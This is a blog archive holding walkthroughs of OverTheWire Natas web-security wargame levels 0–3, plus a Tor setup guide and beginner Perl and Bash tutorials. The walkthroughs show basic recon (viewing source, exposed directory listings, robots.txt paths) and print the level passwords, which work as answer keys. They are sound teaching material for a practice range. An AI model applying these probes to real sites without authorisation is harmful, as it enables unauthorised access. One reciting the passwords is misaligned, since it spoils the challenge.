<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0Aw3UkY36mDw_kJc2jo0ZsJgdKHLffg7UVxKV4_hBVmQVOBoXG3_OsHzITaN0wfpggYjBs-2wbYqGsWV4bJDe7WhBORav-JTr9qqhOBvoxBEp695zM6aAXMvcwidJp5PCtk-jXQ6oqo/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0Aw3UkY36mDw_kJc2jo0ZsJgdKHLffg7UVxKV4_hBVmQVOBoXG3_OsHzITaN0wfpggYjBs-2wbYqGsWV4bJDe7WhBORav-JTr9qqhOBvoxBEp695zM6aAXMvcwidJp5PCtk-jXQ6oqo/s640/1.PNG" width="640" /></a></div>
<br />
Not even Google will find it? What does that mean?<br />
Well, if you didn't already know, there are files on web servers called "robots.txt" which tell searches such as Google where <i>not</i> to store information about. Google has one that we can view <a href="http://www.google.com/robots.txt" target="_blank">here</a>. It's pretty much a directory listing of certain stuff that the website wants to keep a "secret" from searches.<br />
<br />
After knowing this, lets see if this website has a robots file by going to the URL/robots.txt<br />
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">User-agent: *
Disallow: /s3cr3t/</pre>
</blockquote>
So we can now see the website wants to disallow the parsing of the /s3cr3t/ folder... so lets just go straight <i>TO</i> that folder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ml_45A5Kz4yBjA1nqz0wC3eqwufqfigSa097kmGMnSqRlWdmlW8ZnAqX1U9aR-VYklQbUPfm0kElx4hs5q05n_4-9VQeYKmn4Bs2Sv-ACXOJUpigqhQkvJujTP9674aI6KGnRXqriaQ/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ml_45A5Kz4yBjA1nqz0wC3eqwufqfigSa097kmGMnSqRlWdmlW8ZnAqX1U9aR-VYklQbUPfm0kElx4hs5q05n_4-9VQeYKmn4Bs2Sv-ACXOJUpigqhQkvJujTP9674aI6KGnRXqriaQ/s400/2.PNG" width="400" /></a></div>
Bam, users.txt again. Opening it up we can see:<br />
<br />
<blockquote class="tr_bq">
natas4:8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz</blockquote>
Which authenticate us to <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>.</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-90526906416527605072012-10-30T10:30:00.002-04:002022-12-20T10:46:18.758-05:00OverTheWire Wargame "Natas" Level 2 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
So <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-1-how.html" target="_blank">Level 1</a> wasn't that bad, either. Let's start <a href="http://natas2.natas.labs.overthewire.org/" target="_blank">Level 2</a> with the credentials that we found in the previous level.<br />
<br />
When we load up level 2, we are presented with this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s400/1.PNG" width="400" /></a></div>
<br />
Kind of ironic since there's text, right?<br />
<br />
<a name='more'></a>Let's once again take a look at the source (this is becoming a thing!):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b-9fFdmQuQPvGaS6U1nVGv5caQNNxRxBDFauprYdkAhFvqQ7uCBi-48Y-9X3RZVg05nccNpCikkbiy-K5vxt7lT2O1xuyeHyJeHlZzEPQM9ACt8p7TgCRcCLJ5BpFDfG9ki6EMcy_AY/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b-9fFdmQuQPvGaS6U1nVGv5caQNNxRxBDFauprYdkAhFvqQ7uCBi-48Y-9X3RZVg05nccNpCikkbiy-K5vxt7lT2O1xuyeHyJeHlZzEPQM9ACt8p7TgCRcCLJ5BpFDfG9ki6EMcy_AY/s640/2.PNG" width="640" /></a></div>
<br />
Hmm, just the normal text... and wait, an image? The <img src...> code is HTML for embedding a picture into a webpage. It's located at files/pixel.png, so we know it's on whatever server is running this webpage.<br />
<br />
Let's try to navigate to it!<br />
<br />
Well, if you opened it like I did, it's just a white page. That makes sense since it's just one pixel. But we know it <i>exists</i> on the server, and there has to be a folder called <i>files.</i> Lets see if we can get to that folder...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-oHmF2OBgxq3NgQy-ZeSVaPfJ32qJfnFE28JwCdpghNWkk6b1cfN6QaTbvBAeoJgl2xV4QZeE_Ms5cQhMRLTAx921Esk8yP6kIwk5Aw1r9lkjjBzMY5bNf2es_A6oNkQ7xuu7Y2L5Ww/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-oHmF2OBgxq3NgQy-ZeSVaPfJ32qJfnFE28JwCdpghNWkk6b1cfN6QaTbvBAeoJgl2xV4QZeE_Ms5cQhMRLTAx921Esk8yP6kIwk5Aw1r9lkjjBzMY5bNf2es_A6oNkQ7xuu7Y2L5Ww/s400/3.PNG" width="400" /></a></div>
<br />
That's something we like to see, a directory listing! We can also see there's another file called "users.txt" in there!<br />
Opening <i>users.txt</i> gives us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KgVWJnT6JVdltIeVYw_PaH4v57EGMwqzM5HhUuwxuHy8_Lcn8G0AlzHe7Y20hJ1TcbZ7I9NZGd52CNV9mt0njCkW8H58e_K-mRmkD0MHE_MryR40i52DmSk9wsQ1NsqWBEyOfiF_T54/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KgVWJnT6JVdltIeVYw_PaH4v57EGMwqzM5HhUuwxuHy8_Lcn8G0AlzHe7Y20hJ1TcbZ7I9NZGd52CNV9mt0njCkW8H58e_K-mRmkD0MHE_MryR40i52DmSk9wsQ1NsqWBEyOfiF_T54/s320/4.PNG" width="320" /></a></div>
Yay, a password for natas3!<br />
We enter the natas3:<span style="white-space: pre-wrap;">lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb on the <a href="http://natas3.natas.labs.overthewire.org/" target="_blank">next level</a> and continue on...</span></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-78648375278315847112012-10-30T09:55:00.001-04:002022-12-20T10:46:19.303-05:00OverTheWire Wargame "Natas" Level 1 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-0-how.html" target="_blank">Level 0</a> was quite easy, for obvious reasons, so lets see if <a href="http://natas1.natas.labs.overthewire.org/" target="_blank">level 1</a> can be any harder.<br />
<br />
For this one, right clicking has been blocked, so we can't break it like we did with level 0... or can we?<br />
<br />
<a name='more'></a>Again, I use Google Chrome, and in Chrome, you can save the source code to your drive!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3KE_c6sasKiUfbxrws3iQaKitioEGeZuFRNI5wnPI6BK6nA78OQ0fyFRgciYNNPES3eCD0138C63s4Kmxe74kBa3b_DLfDTODM-_PQDuvzU8xIDVAgydyF2LG8piHRLmgVGgef8Lo1H4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3KE_c6sasKiUfbxrws3iQaKitioEGeZuFRNI5wnPI6BK6nA78OQ0fyFRgciYNNPES3eCD0138C63s4Kmxe74kBa3b_DLfDTODM-_PQDuvzU8xIDVAgydyF2LG8piHRLmgVGgef8Lo1H4/s320/1.png" width="210" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
If you open this up in a browser, it will still block right clicking, so lets open with our trusty friend Notepad++ (or you can <i>cat</i> it on a Linux system; I'm on Windows 7 right now).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgLoRl236MUCtBRfoqk-zoiAuMRcnXMPgzW6lL9o5nHVG2cdolNU6xgjlvTD3A6nmVNjfHSYA9OdZedn7suy9bml0Sys4afVOFMx7gq6Ypg3d3ionwfVeHqyRjlYszY-PI5aLcFsBdbrM/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgLoRl236MUCtBRfoqk-zoiAuMRcnXMPgzW6lL9o5nHVG2cdolNU6xgjlvTD3A6nmVNjfHSYA9OdZedn7suy9bml0Sys4afVOFMx7gq6Ypg3d3ionwfVeHqyRjlYszY-PI5aLcFsBdbrM/s400/2.PNG" width="400" /></a></div>
<br />
Bam, we have the password for natas2: "aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl".<br />
<br />
Just as easy, but required a tiny bit of thinking on how to get the code. Lets move on to <a href="http://natas2.natas.labs.overthewire.org/" target="_blank">Level 2</a>.<br />
<br />
Here's a little extension if you care to know why this is bad, or why programming <i>like</i> this is bad.<br />
This is known as client-side security and is <i>really bad</i>. Anything that is client side is controlled by the client and thus the hacker.<br />
We can do things like save the page, change the code, and run it again, or change it directly in the browser by simply "inspecting" the code like Chrome allows... and that's not even an addon!<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Keep hackin'.</span></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-5977249182567527962012-10-30T09:16:00.000-04:002022-12-20T10:46:20.575-05:00OverTheWire Wargame "Natas" Level 0 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.overthewire.org/news/" target="_blank">OverTheWire</a> has released a new WarGame called "Natas" which focuses on web security, so I thought I'd try my hand at it and give some walkthroughs/how-tos as I beat each level. I'm still a newbie at websec, so deal with me!<br />
<br />
Going to the front page of <a href="http://www.overthewire.org/wargames/natas/" target="_blank">Natas</a>, it gives us the creds to get into level 0, so we need to find level 1's creds somehow.<br />
<br />
<a name='more'></a>We go to <a href="http://natas0.natas.labs.overthewire.org/" target="_blank">Natas Level 0</a> and enter the creds given to us, "natas0:natas0" which presents us with this page:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6q4mldgdjijcowxVoLIh6Dgi04BQEYnkZ_gpi2Czyh-mfhnM_sWZWqluaI9yscFZ9_nAZ_z3A6sk0ZterEr5Z27Y9FBP8RX_q7kU_4HHHaHElUMNAhdSkCcKDqqrBfB6fArYqGxiHIE/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6q4mldgdjijcowxVoLIh6Dgi04BQEYnkZ_gpi2Czyh-mfhnM_sWZWqluaI9yscFZ9_nAZ_z3A6sk0ZterEr5Z27Y9FBP8RX_q7kU_4HHHaHElUMNAhdSkCcKDqqrBfB6fArYqGxiHIE/s640/1.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
I use Google Chrome as a browser, which can view the source of a webpage directly. To do this, right click and select "view page source":</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYK1wJ2t34Oh6Dm5U0N6O0p4YSe-ndLsjXm7G0YuRO26Mpsit0cNBLjCmif6kr5DwVzpj-jdwBOeleTTVSLfBA0dxgjXM_2bzIM1_4NSit0cZcW2itClten-EfEZnwGbUkyEKCWi4yQY/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYK1wJ2t34Oh6Dm5U0N6O0p4YSe-ndLsjXm7G0YuRO26Mpsit0cNBLjCmif6kr5DwVzpj-jdwBOeleTTVSLfBA0dxgjXM_2bzIM1_4NSit0cZcW2itClten-EfEZnwGbUkyEKCWi4yQY/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
This gives us the source code, which breaks the first level:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibf0xPKqcgZASb0yCVTulhX5C8Ja635LsjIFgQXNgq9-qgr-tTxAD3GW5fMT_S7o11eOYh_wcRfVsXGQyznm61dVUNfYKSq3rEN9QGJ0B5l5IlSRZG0ABkG-lGixlpgBuy2Q6AOzF7ex0/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibf0xPKqcgZASb0yCVTulhX5C8Ja635LsjIFgQXNgq9-qgr-tTxAD3GW5fMT_S7o11eOYh_wcRfVsXGQyznm61dVUNfYKSq3rEN9QGJ0B5l5IlSRZG0ABkG-lGixlpgBuy2Q6AOzF7ex0/s640/3.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
We can see that the password is "9hSaVoey44Puz0fbWlHtZh5jTooLVplC", and we know the username for the next level is natas1, so we can continue to <a href="http://natas1.natas.labs.overthewire.org/" target="_blank">Natas Level 1</a>, congrats!</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-54395104918972569152012-03-06T15:08:00.003-05:002022-12-20T10:46:24.308-05:00Anonymous browsing with Tor [Windows/Linux/Firefox/Chrome]<div dir="ltr" style="text-align: left;" trbidi="on">Anonymity online is one of the most important rights users have today and is a right we are slowly losing due to bills and laws being passed in governments worldwide, especially in the United States.<br />
<br />
Bills like SOPA/PIPA/ACTA and other unconstitutional and unlawful proposals are everywhere and the Internet is standing up against them, with massive sites like Wikipedia and Reddit blacking out their services to bring awareness.<br />
<br />
<br />
<a name='more'></a><br />
If these are passed, everyday Internet interaction would change forever. For those who have visited China or know of the "Great Firewall" are appalled that any government would want to do this to their citizens and freedom, but alas, governments always want more power and money, and this is the way to it.<br />
<br />
Well, enough of the political preaching, lets get into how to by-pass these "Great Firewalls" and other proxy settings to have anonymity on the Internet! Just a note though, it is impossible in this day and age to achieve perfect anonymity. At least one node, person, or organization other than yourself knows who you are and what you view. <b>Using the methods here to conduct illegal activities will not make you safe, you WILL GET CAUGHT eventually</b>, especially if you do it often enough. I'm writing this how-to and informational piece for those constricted by governments or any other blocking method that removes the freedom to the Internet, so again... do not conduct illegal activities without accepting the consequences (which <i>will </i>come).<br />
<br />
The biggest proxy service used in today's age is TOR, or The Onion Router. TOR was created to provide anonymity online for anyone. Their main page is located at: <a href="https://www.torproject.org/">https://www.torproject.org/</a> where you can read up more on them, but I'll be telling you how to install TOR for your needs on Windows and Linux computers.<br />
<br />
<span style="font-size: x-large;"><u>Installing TOR on Windows (XP-Vista-7)</u></span><br />
<br />
Now, installing Tor is quite easy. First, go to <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">this website</a> and click the "Download" large orange button. It's 20.4mbs, so it should only take a few seconds to download. After it's done, run the .exe by double clicking it or single clicking it in the download bar if you're using Chrome.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://i.imgur.com/rgtkc.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="120" src="http://i.imgur.com/rgtkc.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click the orange "Download" button and run the .exe</td></tr>
</tbody></table>After running the executable, an extraction location will appear. Whatever the default is should be fine. <b>Remember this location.</b> Mine was my downloads folder (where I originally downloaded it to). Just click "Extract" and let it do its work, this should take a minute or so.<br />
<br />
When its done extracting, move to that directory and in there should be a folder called "Tor Browser" with everything in it. Yeah, that was easy, right? You can move this folder to where ever you want to "install" Tor to, but it's about 84mb so in this day and age anywhere is really fine. Let's explore what goodies are in the folder now!<br />
<br />
In the "app" folder are all the .dll files necessary for Tor to run.<br />
In the "data" folder are most of the configuration files.<br />
In the "docs" folder are read-mes and open-source licenses.<br />
In the "FirefoxPortable" folder is the portable version of Firefox that Vidalia (a vidalia is a type of onion, by the way) uses.<br />
Finally there's the .exe "Start Tor Browser," go ahead and double click that and let Tor load up its GUI (graphical user interface).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://i.imgur.com/NZUww.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="http://i.imgur.com/NZUww.jpg" width="279" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Vidalia</td></tr>
</tbody></table>This is Tor's GUI called Vidalia. When you loaded it up, there should have been a bar where the "connected to the tor network" is with information about it connecting and authenticating. Also, when you load up Vidalia, it automatically opens the portable Firefox up already connected. Let's test this out and review it.<br />
<br />
If you take a look at the Firefox homepage, it's the check website to see if you're using Tor (how useful!).<br />
Mine looks like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/o55Zg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://i.imgur.com/o55Zg.jpg" width="400" /></a></div><br />
As you can see, it tells me my IP address... but wait... that's not my REAL IP address! It's a proxied IP address to somewhere in the world! If you want to check it against yours, open a command prompt (Start menu -> run -> "cmd" then type "ipconfig /all" and look for your "IPv4 Address"<br />
<b>Note: </b>if you're behind a router, this will be a private address (192.168.x.x). We'll talk about private addressing in another post soon. If you want an alternative to see your real IP address, open up a new browser with Tor not enabled and go to <a href="http://whatismyip.com/" target="_blank">whatismyip.com</a> and it will tell you your REAL IP address.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV6sQNLLIj4EgdmtyNNwy_vs9WmlKp517NrpbfHMSh2QASbvJutrjoQAwntTO5oHXdI_X87RbclKhQNjKaaV-ldsFxsIIQGDsNiCZCdB_Juo8TK4NJQ73ykxJeZ9R1ros26jvbjaEzwHk/s1600/TR5Wv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV6sQNLLIj4EgdmtyNNwy_vs9WmlKp517NrpbfHMSh2QASbvJutrjoQAwntTO5oHXdI_X87RbclKhQNjKaaV-ldsFxsIIQGDsNiCZCdB_Juo8TK4NJQ73ykxJeZ9R1ros26jvbjaEzwHk/s320/TR5Wv.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Too lazy to open Photoshop to blur!</td></tr>
</tbody></table>As you can see, the last two octets (an octet is 8 bits, I will make a post about subnetting and binary later for you guys!) are different than the last two in my Tor IP address.<br />
<br />
Going back to the main menu for Vidalia. The "stop tor" button is quite obvious in what it does (it stops tor!), so I cannot really expound upon that any further.<br />
There are a few cool things here if you want to explore them. For instance, the "view the network" button gives you an amazing look at the connections going on in the Tor network including their IP addresses, their bandwidth, time up, and other interesting facts. It gives points on the map of where they are located and you can zoom in on them.<br />
<br />
The "setup relaying" button is used if you wish to become a forwarding node for the Tor network. If you live in a country outside the United States, I highly suggest looking into your local and federal laws to see if you will receive any problems, and if possible, become a node. Here's the main link to get you started: <a href="https://www.torproject.org/docs/tor-doc-relay.html.en" target="_blank">Relay Configuration</a>.<br />
<br />
The "use a new identity" button refreshes who you are connecting to and updates your IP address. Useful if you want to update your "location" every little while to retain more anonymity.<br />
<br />
The bandwidth graph shows your input/output on the Tor network and is useful to see which nodes have faster connections and the sort.<br />
<br />
The message log is not very useful to the average user, but may come in handy if you need to use it.<br />
<br />
The settings are used if you wish to start Vidalia and the Tor service on start (it's off by default), or update your relaying status, but the settings can all stay default for the average user.<br />
<br />
The exit button closes your Tor connection and the Firefox window associated with it, so don't close the Firefox or Vidalia unless you want to close the other one as well.<br />
<br />
Well, this was a quick write-up for now, I'm going to add in the Linux section as soon as I get dual-booting working on my Dell XPS 15 (there's a large issue with the BIOS and dual-installing, but I should have it fixed soon) and I'll add in the details to how an Onion network runs and other cool things.</div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-80995333823280164032011-10-07T19:03:00.000-04:002011-10-07T19:03:57.118-04:00Scripting in Perl! [Linux/Windows]<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on">So currently at school I'm taking a Scripting in Perl class, and I'm in absolute LOVE with this language. It's easy to understand, has very good English-like syntax, simple array and hash usage, built in BASH support (for all you Linux freaks!), easy GUI creation, and so many other things that we haven't even gotten into.<br />
I'll be posting examples based upon things in my lab and lecture, including full programs, certain syntax, and other cool things. My teacher is very good and explains many things, so you have him at your disposal (meaning, ask me a question I don't know and I'll ask him, learn it, then explain it back to you!).<br />
<br />
Lets get started with basic syntax then get into all the fun stuff.<br />
<br />
<a name='more'></a>Lets go over variables really quick. First of all, variables are declared or initialized with the "$" character. In C++ or Java we say "<i>int variable = 0</i>" or the such, but in Perl it's unique.<br />
In Perl, we initialize numeric variables with the command:<br />
<i>my $variable = 0;</i><br />
which would mean we create the variable "variable" and set it equal to zero. To just declare it it's as simple as just saying "<i>my $variable</i>"<br />
<br />
Now you might be confused with the "my" command. This deals with the SCOPE of the variable. Many of you probably know what "scope" means, but if you don't, here's a quick definition.<br />
The "scope" of a variable can be thought of as the lifetime of that variable, or where it can be referenced in your code. If you declare a variable in one block of code (say, a for loop), but try to change it outside of it, Perl won't allow it since it can't "see" the variable because it's "dead" or out of our scope!<br />
I'm sure you'll all understand the "my" command soon enough, it's pretty simple and doesn't require much thought; just make sure you use it when declaring and initializing variables for the first time.<br />
<br />
Now, remember how I said we initialize "numeric variables" with the above command? Well, you might be surprised to hear that numeric variables and strings are created the same way!<br />
Here's how we create a simple string:<br />
<i>my $string = "this is some text to equal string";</i><br />
and it's as simple as that.<br />
<br />
Perl looks at the value of the variable rather than the type, so you don't have to say "double" or "int" or "string"!<br />
<br />
Lets talk a but more about variables in Perl. Every PERL variable has three components: The name, address, and value.<br />
<br />
Take this line of code for instance:<br />
<i>my $pet = "Noah";</i><br />
The name is "pet", the address in memory is hidden right now, and the value is "Noah".<br />
<br />
The address (called a reference as well) can be shown by a "scalar" and placed into another variable:<br />
<i>my $pet_ref = \$pet;</i><br />
<i><br />
</i><br />
Note the \$...<br />
Like in C++, this is the REFERENCE (shown in C++ by the asterisk *); it references the <b>address in memory</b>.<br />
<br />
The following line of code prints the variable that we placed the reference of $pet into:<br />
<i>print $pet_ref;</i><br />
<i>...</i>which would be the memory location!<br />
<br />
<div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Open for answer!</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Close'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Open'; }" style="font-size: 11px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Open" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;">Ignore this for now, it'll be used for asking questions and checking code I ask you to write!</div></div></div></div></div><br />
</div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-57108980457797889552011-08-16T20:02:00.011-04:002011-10-05T12:39:16.109-04:00BASH scripting in Linux: an introduction [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">I've already used a bit of <a href="http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29">BASH scripting</a> in my Wifi sniffing tutorial, but the importance of scripting in BASH and other languages such as Perl, Ruby, and Python is so great I need to write separate posts for them all.<br />
Bash stands for "Bourne-Again Shell" (you will see "sh" stands for "shell" in many places). Named aptly for being the successor of the Bourne Shell, it came into use in 1989 and has since been a main scripting language for Linux and has many different options such as piping (seen before on my blog), variables and control structures (like all good languages), file reading, and the Unix "wildcard" usage by the asterisk (*) key.<br />
<br />
Enough about stuff I'm sure you guys don't care about, lets jump right in!<br />
<a name='more'></a>First, I'll start off with some basic BASH variables and interesting things you should know before attempting to write your own program, then I'll go over basic programming syntax in a BASH environment and show some examples.<br />
<br />
In Unix as well as MSDOS and Windows, there are variables (I'm sure we all know what variables are) called "environment" variables, and they deal with certain processes running and affect those processes in many ways. Here's a short list of important ones:<br />
<br />
<b>PATH</b> - lists directories the shell searches, for the commands the user may type without having to provide the full path.<br />
<b>HOME</b> - indicates where the user's "home" directory is located in the file hierarchy.<br />
<b>USER</b> - indicates the current user. Try running the command "echo $USER" and viewing the output; it should be your login.<br />
<b>TERM</b> - specifies the type of terminal being used by the user.<br />
<b>PS1</b> - specifies how the prompt is displayed in the shell or terminal while the system waits for a command. Mine on Backtrack5 is ">" but for some it is "$" this can be changed to be anything (for instance, your current directory for easy knowledge).<br />
<b>PS2</b> - specifies how the prompt is displayed in the shell or terminal while the system waits for more input; it is like the PS1, but instead of when there is no command running, this is for when a command or process is waiting for more input.<br />
<b>MAIL</b> - used to indicate where a user's mail is to be found.<br />
<b>TEMP</b> - location where processes can store temporary files while running a script or process.<br />
More will be added, but this is a good list of some important ones you can use for now. Try Googling with the Google search above if you want to find out more about environment variables in Linux/Unix.<br />
<br />
Now before starting your scripting career in BASH, there are some important things you need to remember. The first is that one should ALWAYS ALWAYS ALWAYS start their script file with <b>#!/bin/bash </b>(which you will hear programmers refer to as "hash bang").<br />
This tells the Unix environment what type of shell you're using (bash in this case), and the location of the shell.<br />
Have this set as your first line and keep a couple blank lines in between this and the actual code so you realize where this is. It should ALWAYS be first. I think you get the importance of this.<br />
For future note when I write my Perl tutorial, the first line in a Perl (.pl) script must be "#!/usr/bin/perl"<br />
<br />
When you make your script file, whether it be through Nano or another text editor such as Vi/Vim, I like to have the format in the format: "filename.sh" where the ".sh" tells us it's a shell script file. You can name it mostly anything, but it's quite a bit easier keeping it ".sh" so later if you're using the ls command or whatnot, you can search for all your shell scripts!<br />
<br />
After we've created the file and added in the #!/bin/bash line, we need to make this executable by the system. To do this, we type the command "chmod +x filename.sh"<br />
What this does is adds to the file the access of executable (the plus sign adds, and the x stands for executable). After we've done this, we can run the file by typing a few different commands.<br />
You can either type "./filename.sh" or "sh filename.sh" or "bash filename.sh" to run it. The first requires you to be in the same directory, however.<br />
Other options you can add are "r" and and "w" which stands for read and write respectively. You can add and remove these privileges by typing +rwx or -rwx depending on which you want. You can also use numbers to differentiate what privleges you want.<br />
Instead of my reiterating this topic, <a href="http://catcode.com/teachmod/numeric.html">here's an excellent and short website that explains it</a>.<br />
<br />
<div style="text-align: center;"><b><u><span class="Apple-style-span" style="font-size: large;">If->Then conditional statements:</span></u></b></div><b><u><br />
</u></b><br />
I'm sure most of you have programmed before, whether it be in C++, Java, or some other language and are somewhat aware of how to use if then statements, but for those who aren't, I'll explain what they are quickly and for everyone the syntax (which means formation) of them in BASH.<br />
<br />
If then statements are pretty easy to understand since they're named aptly for their use. They are used as a conditional statement (meaning, it tests a condition) and depending on the return (whether or not it is true or false) it executes (or runs) a certain line or lines of code that you choose.<br />
<br />
The syntax of if then statements in BASH is as follows:<br />
<i><br />
</i><br />
<i>if [condition]; then</i><br />
<i> expression if true</i><br />
<i>else</i><br />
<i> expression otherwise if false</i><br />
<i>fi # ends if statement</i><br />
<i><br />
</i><br />
The ending "fi" is necessary for BASH to tell the computer where your if statement starts and ends. "fi" is of course "if" backwards.<br />
You can have an if then statement with only one set of expressions (it doesn't require an "else" part), or as many "elses" as you want, but you HAVE TO end with the "fi" line.<br />
